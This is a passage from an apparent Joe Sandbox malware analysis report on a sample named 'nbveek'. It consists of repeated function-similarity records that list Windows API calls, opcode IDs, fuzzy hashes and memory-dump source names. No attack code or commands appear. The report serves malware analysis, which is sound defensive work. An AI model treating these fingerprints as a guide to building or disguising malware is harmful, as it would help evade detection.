                                                                                                                                                                                      • Instruction ID: e49f25be7f279b7c666993d897b99355ce4ae90bfc5226cc5ea7928e9581df23
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cab172756af0c72275bde377b76f196a89affce13a70a09d3f8e5004b176d96
                                                                                                                                                                                      • Instruction Fuzzy Hash: DC310371A046008BFB1CDB78DC997ACFF72AB86324F648618E5249B3D4D7369980CB61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01176FD8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 0a65193fe3b20e1534a103ff9dcc329dc5844afba716cadb86774a1d2d58a32d
                                                                                                                                                                                      • Instruction ID: b800d14ab0c8fab7700dece89406fefb7247a086f42a20af6062ebbc64c203a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a65193fe3b20e1534a103ff9dcc329dc5844afba716cadb86774a1d2d58a32d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C314772A042008BEB1DDB78DC997ADFF72AB86324F248218D4149B3D5D77699808B61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0117710D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 27f413011f6425d0ae2c3ab33c8c03e2b4abb252f10f41d2e2cfb4d2a3b939e2
                                                                                                                                                                                      • Instruction ID: a9abc343eb23a3987e4da6ff8c84dc8754fc8d094ab7b5b096d934ffa997f672
                                                                                                                                                                                      • Opcode Fuzzy Hash: 27f413011f6425d0ae2c3ab33c8c03e2b4abb252f10f41d2e2cfb4d2a3b939e2
                                                                                                                                                                                      • Instruction Fuzzy Hash: AC310372B001458BEB1CDB78EC893ACFB73AB86324F348618D524AB3D4D77699808B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01177242
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 65fe0dcd269691ab9f07fc98dad6291a28d7a9859307c8dcb878cee88f52c4b8
                                                                                                                                                                                      • Instruction ID: 6d5ba939ebe787bc4065b3f9d1f017475eccd5a043d4a38b96e0a14fefb3cc6b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 65fe0dcd269691ab9f07fc98dad6291a28d7a9859307c8dcb878cee88f52c4b8
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1312572A041048BEB1CDBB8DD8D7ACFF72AB86324F348218E525973D4D77699808B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01177377
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 5ce7e924248f4e5fef8d406a3e82ff64b82e9fdb6ad8a19cbbbc80c20891101f
                                                                                                                                                                                      • Instruction ID: 7b2cf7f6237fc0912f090fec74765d1bbb33d321873a01f788d6ee1889061998
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ce7e924248f4e5fef8d406a3e82ff64b82e9fdb6ad8a19cbbbc80c20891101f
                                                                                                                                                                                      • Instruction Fuzzy Hash: C4310372A042018BEB1CDB78DC9A7ACFF72AB86324F24861CD521A73D4C77699808B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 011774AC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 9332b1a9bf663eb1eeae378011e2d03aff858c6a9707f6b83bc9e1da3b1d2158
                                                                                                                                                                                      • Instruction ID: e0156e9a5ed1f04dd39a8305b1de075965920aaded39e23b7014ee2e021bf99b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9332b1a9bf663eb1eeae378011e2d03aff858c6a9707f6b83bc9e1da3b1d2158
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75312772B042448BEB1CDB78DC9D7ACFF72AB86324F248618D425973D4C77599808B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 011775E1
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 4544735e8f9543c549b661efffb8ed845675b9dcd82af5b5a8329b932f42a82f
                                                                                                                                                                                      • Instruction ID: 0736c2e608f84cfad2eb319073e6e0cf2fd3373a098ad31d450f0a885466d89d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4544735e8f9543c549b661efffb8ed845675b9dcd82af5b5a8329b932f42a82f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6131F172B042408BEB1CDB7CDD8D7ACBB72AB86324F248218E521A73D8D77599808B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01177716
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 97a28acd180390120daa428af66f950bae79d506cf1beb3e76a9dc9ee9caa374
                                                                                                                                                                                      • Instruction ID: a3c25f653efd7325d336f1be39bdf9aa47d74e57fb4544882fbee74be7d7db9a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 97a28acd180390120daa428af66f950bae79d506cf1beb3e76a9dc9ee9caa374
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F313372A005408BEB1CDB7CDD8D7ACFF72AB86324F248618D421AB3D4D77599808B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0117784B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: b25f6c6c6e424dd65e6ecbaaa2140e5ad9d497635ad9e2ab371c30065c9a097c
                                                                                                                                                                                      • Instruction ID: e09726c45c8abd2eaac42858faa69d55cd083536b01ce429e2deae4456c95e83
                                                                                                                                                                                      • Opcode Fuzzy Hash: b25f6c6c6e424dd65e6ecbaaa2140e5ad9d497635ad9e2ab371c30065c9a097c
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0312472B042059BE71CEBB8DD997ACFB72AF86324F288218D420973D4D7755980CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01177980
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 256261f121fd4208008458dde1e7144595091eaabe59c1a7c93e73c547d529fa
                                                                                                                                                                                      • Instruction ID: 0762ccfa796a750990f9dfa7608025a9105d5ee889f186ab1e333d37885cb464
                                                                                                                                                                                      • Opcode Fuzzy Hash: 256261f121fd4208008458dde1e7144595091eaabe59c1a7c93e73c547d529fa
                                                                                                                                                                                      • Instruction Fuzzy Hash: F0312472A041458BEB1CEBB8D88D7ACFF72AB82324F28C618D461973D4D73599808B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01177AB5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 8d1333889319323ff5c0213b623d7c12b137ba9c0eb8920b814b5e546a4e4f6c
                                                                                                                                                                                      • Instruction ID: 1159a719a239170337cf4adbd02da7bafc400fc4a06b4abf3b54e7a781d5ff94
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d1333889319323ff5c0213b623d7c12b137ba9c0eb8920b814b5e546a4e4f6c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 21314572A041459BEB1CEBB8DC9D7BDFF72AF86324F288218D520973D4D73599808B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01177BEA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 53c12ec31c2dbbac8d536b849a4b7cb33b6bae11add3fb7ed81b64e13e32c4c1
                                                                                                                                                                                      • Instruction ID: b21eabd95908dd5e0ec3ce39568a9891d4eab43e4d29c7fb4dfb1b9924a42bb7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 53c12ec31c2dbbac8d536b849a4b7cb33b6bae11add3fb7ed81b64e13e32c4c1
                                                                                                                                                                                      • Instruction Fuzzy Hash: C0314572B002468BE71CDB78DD8D3ACFF72AB8A324F248218D515973D4D73699808B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                                      • Opcode ID: 4d5a5d48881a74419f168a751c1dae243ba74886557c76088542bd109afbbe33
                                                                                                                                                                                      • Instruction ID: b4a26798644a34c5e6f5405ada499fb59189e843e5bc5b7788b56a7c9c209db6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d5a5d48881a74419f168a751c1dae243ba74886557c76088542bd109afbbe33
                                                                                                                                                                                      • Instruction Fuzzy Hash: 66112A71A0420AAFCF09DF58E94099B7BF5EF48304F0440A9F809EB251D770EA11CBA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0118F5D6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0118DD94,00000001,00000364,00000006,000000FF,?,011870CE,A875633B,?,011857EB,?), ref: 0118F617
                                                                                                                                                                                      • _free.LIBCMT ref: 0118EA76
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                      • Opcode ID: f37bf10e86b648c3fef1a1cd24242da2b753fab306989087883b6d1091671d77
                                                                                                                                                                                      • Instruction ID: 8db6d08f5ad53358d3bf55a6829e6ca46bf3709d499b4f97b9b68264c7ef2677
                                                                                                                                                                                      • Opcode Fuzzy Hash: f37bf10e86b648c3fef1a1cd24242da2b753fab306989087883b6d1091671d77
                                                                                                                                                                                      • Instruction Fuzzy Hash: E9016D726053176FC325EF68D880999FB98FB04770F014229E545B76C0E770AC02CFA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: a60b9cbc141d53de08e6ce3ef8ee266e6fcee76fd04856e55e3631752523645e
                                                                                                                                                                                      • Instruction ID: bd536b63070af759f0383734213e10d202920822c77d6e7769eee8f01ac0a800
                                                                                                                                                                                      • Opcode Fuzzy Hash: a60b9cbc141d53de08e6ce3ef8ee266e6fcee76fd04856e55e3631752523645e
                                                                                                                                                                                      • Instruction Fuzzy Hash: A2012172C04219AFDF19BBA8A90179E7FF4AF04254F10C167E914E3191EB719A509B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: ba816259046d0be75618ad59585a9379a16cd9c489139ff9f294c9ae352ba751
                                                                                                                                                                                      • Instruction ID: af34901aedcebddeb0c5a6e3e534e6613b587729fa003ab0fc3ac54fe0c8149c
                                                                                                                                                                                      • Opcode Fuzzy Hash: ba816259046d0be75618ad59585a9379a16cd9c489139ff9f294c9ae352ba751
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17014F72C0415ABFCF06AFA89C019EE7FB5BF18214F144165EE24E2191E7318A20DB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0118DD94,00000001,00000364,00000006,000000FF,?,011870CE,A875633B,?,011857EB,?), ref: 0118F617
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: b84baf4f3481a093e803a3c4ab08e02730516213ec3f60b6a6f4da2afa102a7e
                                                                                                                                                                                      • Instruction ID: 3f88cdacfa101c4a2c6bbbcd561f284dc5824e656dc594ff0da9b9156b56d32c
                                                                                                                                                                                      • Opcode Fuzzy Hash: b84baf4f3481a093e803a3c4ab08e02730516213ec3f60b6a6f4da2afa102a7e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 14F0BB3291412366A72D7E3AD801A5B7B58EF41678B25C2119915D7190DF30D4028EF5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,A875633B,?,?,011870CE,A875633B,?,011857EB,?,?,?,?,?,?,01173B45,?), ref: 0118D81C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
